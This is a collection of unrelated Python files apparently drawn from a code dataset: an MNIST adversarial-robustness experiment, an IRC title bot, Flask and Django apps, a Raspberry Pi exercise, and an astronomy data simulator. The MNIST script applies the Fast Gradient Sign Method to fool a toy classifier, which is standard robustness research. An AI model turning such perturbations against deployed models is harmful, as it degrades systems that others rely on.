x_inp})\n\n    def update(self, sess, x_inp, y_inp, global_step):\n        \"\"\"\n        Runs an update step.\n        Args:\n            sess: Tensorflow Session\n            x_inp: input\n            y_inp: correct outputs\n        \"\"\"\n        feed_dict = {self.x:x_inp, self.y:y_inp}\n        summaries, accuracy, loss, gradient, _ = sess.run([self.summaries, self.accuracy, self.loss, self.grads, self.train_op], feed_dict=feed_dict)\n        if self.summary_writer:\n            self.summary_writer.add_summary(summaries, global_step=global_step)\n        return accuracy, loss, gradient\n\n    def get_gradients(self, sess, x_inp, y_inp, global_step):\n        \"\"\"\n        Returns gradients, accuracy and loss\n        Args:\n            sess: Tensorflow Session\n            x_inp: input\n            y_inp: correct outputs\n        \"\"\"\n        feed_dict = {self.x:x_inp, self.y:y_inp}\n        accuracy, loss, gradient = sess.run([self.accuracy, self.loss, self.grads], feed_dict=feed_dict)\n        return accuracy, loss, gradient\n\n# Training Variables\n# For storing model/saving summaries\nexperiment_dir = \"./experiments/\"\nif not os.path.exists(experiment_dir):\n    os.makedirs(experiment_dir)\ncheckpoint_dir = os.path.join(experiment_dir, 'checkpoints')\ncheckpoint_path = os.path.join(checkpoint_dir, \"model\")\nif not os.path.exists(checkpoint_dir):\n    os.makedirs(checkpoint_dir)\n\n# Learning constants\nlearning_rate = 0.001\ntraining_epochs = 15\nbatch_size = 128\n\n# Adversarial constants\nepsilons = np.linspace(0.005, 0.5, 1000)\naccuracies = list()\n
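\n# Illustrative note (added): the adversarial loop at the end of this script\n# applies the Fast Gradient Sign Method (FGSM), x_adv = x + epsilon * sign(dL/dx).\n# A minimal standalone version of that perturbation:\ndef fgsm_perturb(x, grad, epsilon):\n    # shift each pixel by +/- epsilon in the direction that increases the loss\n    return x + epsilon * np.sign(grad)\n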
model = MNIST_Basic(scope=\"basic\", summaries_dir=experiment_dir, learning_rate=learning_rate)\n\n
with tf.Session() as sess:\n    sess.run(tf.global_variables_initializer())\n\n    train = True\n\n    saver = tf.train.Saver()\n    latest_checkpoint = tf.train.latest_checkpoint(checkpoint_dir)\n    if latest_checkpoint:\n        print(\"Loading Checkpoint \", latest_checkpoint)\n        saver.restore(sess, latest_checkpoint)\n        train = False\n\n    step = 0\n\n    if train:\n        for epoch in range(training_epochs):\n            saver.save(tf.get_default_session(), checkpoint_path)\n            total_batch = int(mnist.train.num_examples / batch_size)\n\n            for i in range(total_batch):\n                batch_x, batch_y = mnist.train.next_batch(batch_size)\n                model.update(sess, batch_x, batch_y, step)\n                step += 1\n    # Check if model works, should get accuracy of about .96 here\n    test_x, test_y = mnist.test.images[:256], mnist.test.labels[:256]\n    test_accuracy = model.update(sess, test_x, test_y, step)[0]\n    print('Test Accuracy: ', test_accuracy)\n\n    # Accuracy of unperturbed model\n    test_x, test_y = mnist.test.images[:256], mnist.test.labels[:256]\n    acc, loss, test_grad = model.get_gradients(sess, test_x, test_y, step)\n    print(acc)\n\n    for epsilon in tqdm(epsilons):\n        # Accuracy of perturbed model\n        test_x_2 = test_x + np.sign(test_grad)[0] * epsilon\n        acc, loss, test_grad = model.get_gradients(sess, test_x_2, test_y, step)\n        accuracies.append(acc)\n","sub_path":"shallowMNIST/shallowmnist.py","file_name":"shallowmnist.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"389660487","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport re\nimport html.parser\nimport json\nfrom urllib.request import urlopen\n\nimport doctor\nfrom doctor import message\n\n
TitlePattern = re.compile(b'<title>(.*?)<\\\\/title>', re.I | re.S)\nYouTubePattern = re.compile('https?://(www\\\\.)?(youtube\\\\.com/.+(\\\\?|&)v=|youtu\\\\.be/)([a-zA-Z0-9\\\\-_]{10,13})', re.I)\nURLPattern = re.compile('((http|ftp|https):\\\\/\\\\/[\\\\w\\\\-_]+(\\\\.[\\\\w\\\\-_]+)+([\\\\w\\\\-\\\\.,@?^=%&:/~\\\\+#]*[\\\\w\\\\-\\\\@?^=%&/~\\\\+#])?)', re.I)\nMediaPattern = re.compile('(png|jpg|bmp|gif|avi|mpg|flv|3gp|mp4|exe|msi|mp3|flac|tar\\\\.gz|tar\\\\.bz2)$', re.I)\n\n
def read_page(url, amount=0):\n    page = b''\n    if not amount:\n        try: page = urlopen(url, timeout = 2.0).read()\n        except: pass\n    else:\n        try: page = urlopen(url, timeout = 2.0).read(amount)\n        except: pass\n\n    return page\n\n
def title(url):\n    youtube = YouTubePattern.match(url)\n\n    if youtube:\n        page = read_page('http://gdata.youtube.com/feeds/videos/%s?alt=json' % youtube.group(4)).decode('utf-8')\n        result = json.loads(page)['entry']\n\n        return '(\\x0310%s\\x03) %s' % (\n            result['media$group']['media$category'][0]['label'], \n            result['title']['$t']\n        )\n    else:\n        if MediaPattern.match(url): return\n\n        page = read_page(url, 1024)\n        title = TitlePattern.search(page)\n        \n        if title:\n            h = html.parser.HTMLParser()\n            title = h.unescape(title.groups(0)[0].decode('utf-8')).strip().replace('\\n', ' ').replace('\\r', '')\n\n            return title\n        return\n
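\n# Note: title() above reads only the first 1024 bytes of the page, so a\n# <title> tag that starts beyond that point will not be found; the trade-off\n# keeps the handler fast on large pages.\n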
\n@message\ndef message(network, user, channel, msg):\n    match = re.search(URLPattern, msg)\n    if match:\n        url = match.groups(0)[0]\n        text = title(url)\n\n        if text:\n            channel.say(text)\n\n","sub_path":"scripts/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"257266759","text":"import os\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef save_image(path, success, is_resize, end_frame):\r\n    \r\n    cnt=0\r\n    while success:\r\n        success, image = vidcap.read()\r\n        if not success:\r\n            break\r\n        if is_resize==1:\r\n            image2= cv2.resize(image,(800,400))\r\n        else:\r\n            image2=image\r\n        \r\n        file_path = os.path.join(path, \"frame%.5d.jpg\" % cnt )\r\n        cv2.imwrite(file_path, image2)\r\n        cnt+=1\r\n        \r\n        print(\"%d image done \" %cnt)\r\n        \r\n        if cnt== end_frame:\r\n            break\r\n\r\nend_frame = 400\r\n\r\nprint(\"save resize image\")\r\nvidcap = cv2.VideoCapture('Frames/mov1.mp4')\r\nsuccess, image = vidcap.read()\r\nsave_image('Frames/jpg', success, 1, end_frame)\r\n\r\nprint(\"save original image\")\r\nvidcap = cv2.VideoCapture('Frames/mov1.mp4')\r\nsuccess, image = vidcap.read()\r\nsave_image('Frames/jpg_ori', success, 0, end_frame)\r\n \r\n \r\n \r\n ","sub_path":"mp4_image.py","file_name":"mp4_image.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"251279734","text":"# Lucas Hanson - Homework 2 - Problem 1\n\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\n\nled1 = 17\nled2 = 27\nled3 = 22\n\nGPIO.setup(led1,GPIO.OUT)\nGPIO.setup(led2,GPIO.OUT)\nGPIO.setup(led3,GPIO.OUT)\n\nwhile True:\n\tselection = int(input(\"Please enter a number between 1 and 3: \"))\n\tif selection == 1:\n\t\tGPIO.output(led1,True)\n\t\ttime.sleep(5.0)\n\telif selection == 2:\n\t\tGPIO.output(led1,True)\n\t\tGPIO.output(led2,True)\n\t\ttime.sleep(5.0)\n\telif selection == 3:\n\t\tGPIO.output(led1,True)\n\t\tGPIO.output(led2,True)\n\t\tGPIO.output(led3,True)\n\t\ttime.sleep(5.0)\n\telif selection > 3:\n\t\tprint(\"Error, number out of range\")\n\telif selection < 1:\n\t\tprint(\"Error, number out of range\")\n\t\n","sub_path":"HW1_P1.py","file_name":"HW1_P1.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"42829615","text":"from flask import Flask, render_template, url_for, request\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\n\napp = Flask(__name__)\n\n@app.route('/',methods=['POST','GET'])\ndef index():\n    return render_template(\"menu.html\")\n\n
@app.route(\"/predictor\",methods=[\"POST\",\"GET\"])\ndef predictor():\n    def predictor(array, clase):\n        df = pd.read_csv('dataset/data_features.csv')\n        df1 = pd.read_csv('dataset/data_'+str(clase)+'.csv')\n        # Drop the animal names since this is not a good feature to split the data on\n        dataset = df.drop(\"ESPECIE\", axis=1)\n        # Split the data into features and target\n        features = dataset.drop('FAMILIA', axis=1)\n        targets = dataset['FAMILIA']\n        # Split the data into a training and a testing set\n        train_features, test_features, train_targets, test_targets = train_test_split(features, targets, train_size=0.80)\n        # Train the model\n        tree= DecisionTreeClassifier(criterion=\"entropy\")\n        tree= tree.fit(train_features, train_targets)\n        # Make prediction\n        features = pd.DataFrame(data=None,columns=df.columns ).drop(['ESPECIE','FAMILIA'], axis=1)\n        features.loc[len(df)] = array\n        prediction = tree.predict(features)[0]\n        # Obtain species\n        species = df1.loc[df1['FAMILIA'].apply(lambda x: x.lower()) == prediction]\n        return species\n\n    if request.method == 'POST':\n        \n        clase = request.form['clase']\n        # each taxon field is an optional integer; empty fields default to 0\n        feature_names = ['theria', 'eutheria', 'metatheria', 'neognathae', 'paleognathae',\n                         'carnivora', 'artiodactyla', 'rodentia', 'chiroptera', 'cingulata',\n                         'primates', 'perissodactyla', 'didelphimorphia', 'lagomorpha',\n                         'paucituberculata', 'pilosa', 'apodiformes', 'tinamiformes',\n                         'anseriformes', 'galliformes', 'phoenicopteriformes', 'podicipediformes',\n                         'columbiformes', 'cuculiformes', 'caprimulgiformes', 'opisthocomiformes',\n                         'gruiformes', 'charadriiformes', 'sphenisciformes', 'procellariiformes',\n                         'ciconiiformes', 'strigiformes', 'trogoniformes', 'coraciiformes',\n                         'galbuliformes', 'falconiformes', 'psittaciformes']\n        array = [int(request.form[name]) if request.form[name] != \"\" else 0\n                 for name in feature_names]\n\n        df = predictor(array, clase)\n        return render_template(\"predictor.html\", tables=[df.to_html(classes=\"table table-dark\", header=\"true\")])\n    else:\n        return render_template(\"predictor.html\")\n    \n\n@app.route(\"/clasificador\",methods=[\"POST\"])\ndef clasificador():\n    return render_template(\"clasificador.html\")\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"16252368","text":"\"\"\"Manages operations to save manual calls\"\"\"\nfrom datetime import datetime\nfrom campaigns.models import AnswersHeader\nfrom agent_console.models import Calls, Campaign, Agent\nfrom campaigns.models import DataLlamada, CampaignForm\n\n\ndef create_call(request, answer_header_id):\n    answer_header = AnswersHeader.objects.get(pk=answer_header_id)\n    if answer_header.call_id is None:\n        request_data = request.data.copy()\n        data_llamada = DataLlamada.objects.get(pk=request_data.get(\"data_llamada\"))\n        campaign_form = CampaignForm.objects.get(pk=request_data.get(\"campaign\"))\n        new_call = Calls()\n        new_call.id_campaign = Campaign(campaign_form.isabel_campaign)\n        new_call.phone = data_llamada.telefono\n        new_call.agent = request_data.get('agent')\n        new_call.retries = 0\n        new_call.status = \"Success\"\n        new_call.fecha_llamada = datetime.now()\n        new_call.start_time = datetime.now()\n        new_call.end_time = datetime.now()\n        new_call.duration = 0\n        new_call.dnc = 0\n        new_call.date_init = datetime.today()\n        new_call.date_end = datetime.today()\n        new_call.time_init = datetime.now()\n        new_call.time_end = datetime.now()\n        new_call.datetime_entry_queue = datetime.today()\n        new_call.scheduled = 0\n        new_call.save()\n        answer_header.call_id = new_call.id\n        answer_header.campaign = campaign_form\n        answer_header.data_llamada = data_llamada\n        answer_header.save()\n
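\n\n# Illustrative sketch (an assumption, not used above): create_call stamps each\n# field with a separate datetime.now()/today() call, so the stored values can\n# drift by microseconds. Capturing a single timestamp keeps them consistent;\n# `call` stands in for the Calls instance built above.\ndef _stamp_consistently(call):\n    now = datetime.now()\n    call.fecha_llamada = now\n    call.start_time = now\n    call.end_time = now\n    call.time_init = now\n    call.time_end = now\n    call.date_init = now.date()\n    call.date_end = now.date()\n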
","sub_path":"campaigns/business_logic/manual_calls.py","file_name":"manual_calls.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"44934243","text":"from django.conf import settings\nfrom django.urls import path\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n    path(\"\", views.VacanciesView.as_view()),\n    path(\"vacancies/\", views.VacanciesListAPIView.as_view()),\n    # the URL converters in the detail routes were eaten by markup stripping;\n    # restored here as <int:pk>, the usual Django detail-route convention (an assumption)\n    path(\"<int:pk>/\", views.VacanciesDetailView.as_view()),\n    path(\"vacancies/<int:pk>/\", views.VacanciesDetailAPIView.as_view()),\n    path(\"request/\", views.RequestCreateView.as_view()),\n    path(\"practice/\", views.AddPracticeView.as_view()),\n    path(\"practice/<int:pk>/\", views.DeletePracticeView.as_view()),\n]\n\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"careers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"382711959","text":"import re\nfrom Tagger.config import BLACK_LIST_TERMS\n\nBRACKETS = [\"\\\\(\", \"\\\\)\", \"\\\\[\", \"\\\\]\", \"{\", \"}\"]\nCOMMON_DELIMETERS = [\",\", \"-\", \"_\"]\n\n# any bracket / space followed by [Ff]t/eat/eaturing followed by optional .\nFEATURING = [\"[\" + \"\".join(BRACKETS) + \" \" + \"]\" + \"[Ff](?:eaturing|eat|t)\\\\.?\"]\nDELIMETER_STRING = \"|\".join(FEATURING + BRACKETS + COMMON_DELIMETERS)\nDELIMETERS = re.compile(DELIMETER_STRING)\n\n\ndef filter_black_listed_terms(term):\n    return term.lower() not in BLACK_LIST_TERMS\n\n\ndef chunk_filename(filename):\n    \"\"\"Takes a filename and returns a list of terms\"\"\"\n    return filter(filter_black_listed_terms,\n                  [\n                      term.strip() for\n                      term in re.split(DELIMETERS, filename) if term\n                  ])\n","sub_path":"Tagger/chunker.py","file_name":"chunker.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"312013225","text":"import argparse\nimport json\nimport numpy as np\nimport os\nimport random\nimport sys\n\nimport astroplan\n\nfrom astroplan import Observer\nfrom astropy import units as u\nfrom astropy.coordinates import EarthLocation\nfrom astropy.coordinates import SkyCoord\nfrom astropy.coordinates.angles import Angle\nfrom astropy.io import fits\nfrom astropy.time import Time\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pocs.utils.google.storage import PanStorage\n\n\n#############################################################################\n# This class is a simulator that is designed to simulate larger quantities #\n# of data, more accurate in the levels of data products than               #\n# generate_data_network.py (which has more realistic star data). Use this  #\n# to simulate large quantities of data to test the pipeline. Should        #\n# eventually be merged with generate_data_network.py. 
#\n#############################################################################\n\nclass DataGenerator(object):\n\n \"\"\"Class to generate a network of simulated PANOPTES images and light curves\n\n Now just a wrapper class, should be updated to abstract out other objects eventually\n \"\"\"\n\n def __init__(self, storage=None, local_dir=None, use_cloud=False):\n if use_cloud and not storage:\n storage = PanStorage(bucket_name='panoptes-simulated-data')\n if not local_dir:\n local_dir = '/tmp/sim-data'\n self.storage = storage\n self.cameras = defaultdict(list)\n self.star_dict = {}\n self.unit_dict = {}\n self.local_dir = local_dir\n\n def generate_network(self, num_units, start_date, end_date, use_cloud):\n \"\"\"Generate simulated data from a network of PANOPTES units.\n\n :param num_units: the number of units to simulate\n :param start_date: the start date of observations\n :param end_date: the end date of observations\n \"\"\"\n start_date = datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date = datetime.strptime(end_date, \"%Y-%m-%d\")\n num_nights = (end_date - start_date).days + 1\n if end_date < start_date:\n raise ValueError('End date must be after start date.')\n\n units = []\n if use_cloud:\n units = self.get_current_network()\n\n if len(units) == 0:\n print(\"Simulating new data network from {} units over {} nights. This make take \"\n \"a few minutes...\".format(num_units, num_nights), file=sys.stdout)\n units = self.init_units(num_units)\n else:\n num_units = len(units)\n self.update_cameras()\n print('Adding new simulated data to current network of {} units over {} nights. This may '\n 'take a few minutes...'.format(num_units, num_nights), file=sys.stdout)\n\n # For every night, let every unit observe a few stars, and\n # output a Postage Stamp Cube (PSC) and light curve for each star.\n lc_count = 0\n curr_date = start_date\n while curr_date <= end_date:\n for unit in units:\n\n # Start first sequence 1-2 hours after sunset\n site = self.unit_dict[unit]\n loc = Observer.at_site(site)\n sunset = loc.sun_set_time(\n Time(curr_date, scale='utc'), which='next')\n sunset_time = datetime.strptime(\n sunset.isot, \"%Y-%m-%dT%H:%M:%S.%f\")\n last_obs_end_time = sunset_time + \\\n timedelta(minutes=(random.random() * 60 + 60))\n sequences_per_night = random.randint(4, 6)\n for i in range(sequences_per_night):\n\n stars_per_sequence = random.randint(100, 200)\n start_time, end_time = self.set_obs_time(last_obs_end_time)\n last_obs_end_time = end_time\n\n for j in range(stars_per_sequence):\n\n # Get observation information\n field = self.get_field()\n pic, coords = self.get_fake_pic()\n\n for camera in self.cameras[unit]:\n psc_filename = \"PSC/{}/{}/{}/{}.fits\".format(\n unit, camera, start_time.isoformat(), pic)\n lc_filename = \"LC/{}/{}/{}/{}.json\".format(pic, unit, camera,\n start_time.isoformat())\n\n # Create data products\n hdu = self.build_psc(unit, camera, field,\n pic, coords, start_time, end_time)\n lc = self.build_lightcurve(hdu)\n\n # Write data products to local temp files\n self.write_psc(\n \"{}/{}\".format(self.local_dir, psc_filename), hdu)\n self.write_lightcurve(\n \"{}/{}\".format(self.local_dir, lc_filename), lc)\n\n # Upload data products from local files to cloud\n if use_cloud:\n self.storage.upload(\n \"{}/{}\".format(self.local_dir, psc_filename), remote_path=psc_filename)\n self.storage.upload(\n \"{}/{}\".format(self.local_dir, lc_filename), remote_path=lc_filename)\n lc_count += 1\n\n print('{}|LC{}| {}/{} observed star {} on {}.'.format(\n 
datetime.now().time(), lc_count, unit, camera, pic, curr_date.strftime('%Y-%m-%d')))\n\n stars_per_night = sequences_per_night * stars_per_sequence\n print('{} {} observed {} stars on {}.'.format(\n datetime.now().time(), unit, stars_per_night, curr_date.strftime('%Y-%m-%d')))\n curr_date = curr_date + timedelta(days=1)\n\n def init_units(self, num_units):\n \"\"\"Initialize a network of new units and their cameras, assigning unique IDs.\"\"\"\n units = []\n for i in range(num_units):\n unit = \"PAN{:03d}\".format(i)\n site = random.choice(EarthLocation.get_site_names())\n self.unit_dict[unit] = site\n self.init_cameras(unit)\n units.append(unit)\n return units\n\n def get_current_network(self):\n \"\"\"Get the units and their cameras that currently have simulated data on the cloud.\"\"\"\n units = []\n files = self.storage.list_remote(prefix='LC')\n for fl in files:\n dirs = fl.split('/')\n for i in range(len(dirs)):\n dir = dirs[i]\n if dir.startswith('PAN'):\n unit = dir\n if unit not in units:\n units.append(unit)\n site = random.choice(EarthLocation.get_site_names())\n self.unit_dict[unit] = site\n cam = dirs[i + 1]\n if cam not in self.cameras[unit]:\n self.cameras[unit].append(cam)\n break\n return units\n\n def init_cameras(self, unit):\n \"\"\"Set the camera IDs of the unit.\n\n :param unit: id of the unit\n \"\"\"\n cams_per_unit = 2\n for i in range(cams_per_unit):\n self.add_new_camera(unit)\n\n def add_new_camera(self, unit):\n \"\"\"Add a new camera for the unit.\n\n Select a unique random camera id (first 6 digits of serial number.)\n If collisions occur too many times, raise an exception.\n :param: unit: the unit id to add a camera for\n \"\"\"\n attempts = 0\n same = True\n while same:\n same = False\n cam = \"{:06d}\".format(random.randint(0, 999999))\n for un in self.cameras:\n for c in self.cameras[un]:\n if cam == c:\n same = True\n if attempts > 100:\n raise Exception(\"Can't find unique camera ID.\")\n attempts += 1\n self.cameras[unit].append(cam)\n return cam\n\n def update_cameras(self):\n \"\"\"Update the camera dictionary after getting current data network from cloud\"\"\"\n for unit in self.cameras:\n while len(self.cameras[unit]) < 2:\n self.add_new_camera(unit)\n\n def get_field(self):\n \"\"\"Return random (very fake) field name from list.\"\"\"\n fields = ['field_x', 'field_y', 'field_z']\n return random.choice(fields)\n\n def get_fake_pic(self):\n \"\"\"Generate a fake Panoptes Input Catalog star and random coordinates.\"\"\"\n pic = \"PIC_{:06d}\".format(random.randint(0, 50))\n if pic in self.star_dict:\n coords = self.star_dict[pic]\n else:\n ra = Angle((random.random() * 360) * u.deg)\n dec = Angle((random.random() * 180 - 90) * u.deg)\n coords = SkyCoord(ra.to(u.degree), dec.to(u.degree), frame='fk5')\n self.star_dict[pic] = coords\n return pic, coords\n\n def set_obs_time(self, last_obs_end_time):\n \"\"\"Choose times to begin and end observing the PIC between its rise and set.\n\n :param coords: coordinates of the PIC object from SkyCoord\n :param site: name of the site the unit is at, from astroplan\n :param date: the date of the observation\n :return: randomized start and end time of observation\n \"\"\"\n # Set 0-10 minute buffer between end of last observation and start of\n # new observation\n buffer_new_obs = timedelta(minutes=random.random() * 10)\n start_time = last_obs_end_time + buffer_new_obs\n # Random sequence duration between 1 and 3 hours\n seq_duration = timedelta(minutes=(random.random() * 120) + 60)\n end_time = start_time + 
seq_duration\n return start_time, end_time\n\n def build_psc(self, unit, camera, field, pic, coords, start_time, end_time):\n \"\"\"Generate a postage stamp cube with fake data for the given unit, PIC, and observation time.\n\n :param unit: ID of PANOPTES unit\n :param camera: ID of camera used to take image sequence\n :param field: name of field of original image sequence\n :param pic: PICID of star\n :param coords: coordinates of star, from SkyCoord\n :param start_time: start time of observation\n :param end_time: end time of observation\n :return: Header/Data Unit (HDU) of FITS file\n \"\"\"\n # Set PSC info - fake field, camera, exposure time, and sequence ID.\n obs_time = start_time\n target_name = 'field_{}'.format(field)\n seq_id = '{}_{}_{}'.format(\n unit, camera, obs_time.strftime('%Y%m%d_%H%M%SUT'))\n exptime = 100. # seconds\n sky_background = 1000.\n sky_sigma = 5.\n nx = 12\n ny = 16\n\n # Choose random pixel position of postage stamp in original image\n xpixorg = random.randint(0, 5184 - nx)\n ypixorg = random.randint(0, 3456 - ny)\n\n # Set metadata\n metadata = {'SEQID': seq_id,\n 'FIELD': target_name,\n 'RA': coords.ra.to(u.degree).value,\n 'DEC': coords.dec.to(u.degree).value,\n 'EQUINOX': coords.equinox.value,\n 'PICID': pic,\n 'OBSTIME': obs_time.isoformat(),\n 'XPIXORG': xpixorg,\n 'YPIXORG': ypixorg,\n }\n\n # Set times of exposures and add to metadata, with slightly random time\n # gap between images\n frame = 0\n while obs_time < end_time:\n gap = timedelta(0, exptime + np.random.normal(5, 1))\n obs_time = obs_time + gap\n time = 'TIME{:04d}'.format(frame)\n exp_time = 'EXPT{:04d}'.format(frame)\n metadata[time] = obs_time.isoformat()\n metadata[exp_time] = exptime\n frame += 1\n num_frames = frame\n\n # Make random datacube from normal distribution, with same pixel dimensions as actual\n # (but no meaningful data)\n data_cube = np.random.normal(\n sky_background, sky_sigma, (num_frames, ny, nx))\n hdu = fits.PrimaryHDU(data_cube)\n\n # Add metadata as FITS header and write to file\n hdu.header.extend(metadata.items())\n\n return hdu\n\n def write_psc(self, filename, hdu):\n \"\"\"Write PSC to file\"\"\"\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n hdu.writeto(filename, clobber=True)\n\n def build_lightcurve(self, hdu):\n \"\"\"Generate and write a JSON light curve from the PSC with randomized flux values.\n\n :param hdu: the FITS Header/Data Unit of the PSC\n :return: the light curve as a JSON object\n \"\"\"\n # Make random relative flux and flux uncertainty data\n lc = []\n for key in hdu.header:\n if key[:4] == \"TIME\":\n time = hdu.header[key]\n exptime = hdu.header['EXPT{}'.format(key[4:])]\n seq_id = hdu.header['SEQID']\n sig_r = 0.010\n sig_g = 0.006\n sig_b = 0.017\n r = np.random.normal(1, sig_r)\n g = np.random.normal(1, sig_g)\n b = np.random.normal(1, sig_b)\n entry = {\n 'time': time,\n 'exptime': exptime,\n 'R': r,\n 'G': g,\n 'B': b,\n 'sig_r': sig_r,\n 'sig_g': sig_g,\n 'sig_b': sig_b,\n 'seq_id': seq_id\n }\n lc.append(entry)\n return lc\n\n def write_lightcurve(self, filename, lc):\n \"\"\"Write light curve to file.\"\"\"\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w') as FO:\n json.dump(lc, FO)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Generate data from a network of simulated PANOPTES units.')\n parser.add_argument('num_units', type=int, nargs='?', default=3,\n help='The number of PANOPTES units to simulate.')\n parser.add_argument('start_date', 
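# parsed by generate_network() with datetime.strptime(..., '%Y-%m-%d')\n                        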
type=str,\n help='The start date of the simulated data, in Y-m-d format.')\n parser.add_argument('end_date', type=str,\n help='The end date of the simulated data, in Y-m-d format.')\n parser.add_argument('local_dir', type=str,\n help='The local directory in which to store the simulated data.')\n parser.add_argument('-c', '--cloud', action='store_true',\n help='Upload simulated data to Google Cloud Storage.')\n args = parser.parse_args()\n gen = DataGenerator(local_dir=args.local_dir, use_cloud=args.cloud)\n gen.generate_network(args.num_units, args.start_date,\n args.end_date, args.cloud)\n","sub_path":"scripts/generate_big_data_network.py","file_name":"generate_big_data_network.py","file_ext":"py","file_size_in_byte":15245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"117119392","text":"import cv2\nimport numpy as np\nimport time\nimport pafy\nfrom abc import ABCMeta, abstractmethod\nfrom tqdm import tqdm\n\n\nclass Generator(metaclass=ABCMeta):\n @abstractmethod\n def __init__(self, stream_path, color):\n pass\n\n @abstractmethod\n def generate(self):\n pass\n\n @abstractmethod\n def frame_count(self):\n return int\n\n\nclass StreamGenerator(Generator):\n def __init__(self, stream_path, color):\n self.cap = cv2.VideoCapture(stream_path)\n self.color = color\n\n def generate(self):\n while True:\n\n ret, frame = self.cap.read()\n\n if ret:\n if not self.color:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n yield cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n else:\n self.cap.release()\n cv2.destroyAllWindows()\n break\n\n def frame_count(self):\n return int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n\nclass YoutubeGenerator(StreamGenerator):\n def __init__(self, stream_path, color):\n vPafy = pafy.new(stream_path)\n play = vPafy.getbest(preftype=\"webm\")\n streams = vPafy.streams\n self.cap = cv2.VideoCapture(play.url)\n self.color = color\n\n\nclass Stream:\n def __new__(cls, stream_path, color):\n return StreamGenerator(stream_path, color)\n\n\nclass StreamYT:\n def __new__(cls, stream_path, color):\n return YoutubeGenerator(stream_path, color)\n\n\nclass Deque(metaclass=ABCMeta):\n def __init__(self):\n \"\"\"\n Create numpy multidimensional array\n representing grayscale or RGB with time dimension\n \"\"\"\n\n @abstractmethod\n def appendleft(self, frame):\n \"\"\"\n Simulate collections.deque.append__\n \"\"\"\n pass\n\n @abstractmethod\n def appendright(self, frame):\n \"\"\"\n Simulate collections.deque.append__\n \"\"\"\n pass\n\n\nclass NumpyDeque(Deque):\n def __init__(self, frame_shape, buffer_size):\n self.np_deque = np.zeros(shape=[buffer_size] + list(frame_shape))\n\n def appendleft(self, frame):\n self.np_deque = np.roll(self.np_deque, 1, axis=0)\n self.np_deque[0] = frame\n\n def appendright(self, frame):\n self.np_deque = np.roll(self.np_deque, -1, axis=0)\n self.np_deque[-1] = frame\n\n\nclass Properties:\n FPS = 10\n BUFFER_SIZE = int(3 * FPS)\n\n\nclass BackgroundStabilizator:\n def __init__(self, frame_shape, buffer_size):\n self.base_background = np.zeros(shape=frame_shape)\n self.numeque = NumpyDeque(frame_shape, buffer_size)\n self.start_increment = 0\n\n def append(self, frame):\n self.numeque.appendleft(frame)\n self.start_increment += 1\n\n def median(self):\n # np.save(\"x.npy\", self.numeque.np_deque)\n return np.uint8(np.median(self.numeque.np_deque, axis=0))\n\n def stable_pixels(self):\n \"\"\"\n Slow. High Quality. 
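Computes the per-pixel mode over the buffered frames. 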
Best over long periods of time\n Needs medium deque and low frequency sampling (BUFFER = 100/EVERY 20-60)\n \"\"\"\n u, indices = np.unique(self.numeque.np_deque, return_inverse=True)\n axis = 0\n most_common = u[\n np.argmax(\n np.apply_along_axis(\n np.bincount,\n axis,\n indices.reshape(self.numeque.np_deque.shape),\n None,\n np.max(indices) + 1,\n ),\n axis=0,\n )\n ]\n return np.uint8(most_common)\n\n def average(self):\n \"\"\"\n NOTE:\n\n Fastest. Medium to High quality\n Needs huge deque and hight sampling (BUFFER = 400/EVERY 2)\n\n \"\"\"\n return np.uint8(np.average(self.numeque.np_deque, axis=0))\n\n def xappend(self, frame):\n self.base_background += frame\n\n\nclass StreamPipeline:\n def __init__(self, frame_source):\n self.source = frame_source\n self.base_shape = self.source.__next__().shape\n self.isrgb = False if len(self.base_shape) == 2 else True\n self.base_background = np.zeros(shape=self.base_shape)\n\n def pull(self):\n present_frame = self.source.__next__()\n\n\n# generator = frame_generator(1)\n\n# BCG = Background(generator)\n# print(BCG.isrgb)\n# NumpyDeque(BCG.base_background, Properties.BUFFER_SIZE)\n\n\nclass PPS(BackgroundStabilizator):\n BUFFER_SIZE = 25\n EVERY = 70\n FPS = 0.4\n\n def __init__(\n self, *args, BUFFER_SIZE=20, EVERY=10, stream=None, frame_count=0, **kwargs\n ):\n self.stream = stream\n print(kwargs, args)\n super().__init__(*args, **kwargs)\n self.background_container = {}\n self.pointer = {}\n self.increment = 0\n 